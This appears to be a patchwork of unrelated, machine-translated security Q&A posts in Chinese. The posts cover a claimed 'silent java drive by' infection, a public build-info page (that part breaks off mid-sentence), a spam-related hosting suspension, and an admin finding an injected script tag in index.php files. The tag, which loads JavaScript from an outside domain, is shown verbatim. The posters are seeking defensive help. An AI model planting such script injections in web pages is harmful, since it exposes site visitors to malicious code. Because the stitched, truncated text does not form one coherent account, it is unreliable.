我通过我的网站收到了一条奇怪的联系信息,声称他们发现了一个安全漏洞,并怀疑我是否有一个bug赏金程序。
他们分享的细节如下:
Only what I can say is that I found a way to infect people with silent java drive by on one of your websites .
用无声的java驱动器感染人们意味着什么?
我认识一家电子商务公司,它有一个面向公众的网站,比如www.app.com,它的网页是www.app.com/version.jsp,也可以公开访问。该页具有以下信息。
Build Info
Path: /root/version/app/v5.6/b10
Server: appUSA-prod-srv1
Date: 09/10/2017 6:21 AM
Source: svn@svn
CI: Link (this leads to an internal link which is inaccessible to public)
Gradle is used in n
我的网站主机已经关闭了我的共享主机帐户,因为它通过我的域名发送垃圾邮件。
我已经将所有未路由的邮件(如mailto:aasdasd@domain.com )设置为转发到特定的电子邮件帐户,在该帐户中,我在此表单中找到了数千封返回的电子邮件(我的域名显示为"mydomain.com"):
This message was created automatically by mail delivery software.
A message that you sent could not be delivered to one or more of its
recipients.
我管理几十个网站的主机。从大约一个星期以来,我在index.php文件中的12个不同网站中找到了这段代码:
<script type="text/javascript" src="http://superiot.ru/**.js"></script> // The name of the actual javascript file differs
<!-- some hash here-->
有些网站是在不同的服务器上,有些不是。我只是想知道是否有其他人也看到了这一点。
使用更多信息编辑:
所有服务器都是centOS